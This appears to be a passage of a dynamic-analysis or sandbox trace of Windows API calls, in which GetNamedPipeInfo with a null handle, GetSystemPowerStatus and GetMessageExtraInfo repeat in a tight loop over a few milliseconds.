	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.082] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.082] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.082] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.083] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.083] GetMessageExtraInfo () returned 0x0
	[0130.083] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.084] GetMessageExtraInfo () returned 0x0
	[0130.084] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.084] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.085] GetMessageExtraInfo () returned 0x0
	[0130.085] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.085] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.086] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.086] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.086] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
	[0130.087] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.087] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.087] GetMessageExtraInfo () returned 0x0
